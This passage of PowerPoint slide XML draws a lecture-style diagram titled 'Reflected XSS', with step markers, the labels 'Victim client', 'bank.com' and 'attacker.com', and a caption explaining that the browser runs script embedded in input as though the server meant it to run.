                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717296" y="2185352"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336296" y="2842577"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though server  meant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159625" y="6278372"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Title 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311679A9-990A-A741-AFB0-A3CCE1BDF85A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C49043-6FA8-8F47-9012-D8A7623884AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397625" y="3001772"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a: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09600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="5208588"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="4130040"/>
            <a:ext cx="1379220" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="4191000"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="5094017"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
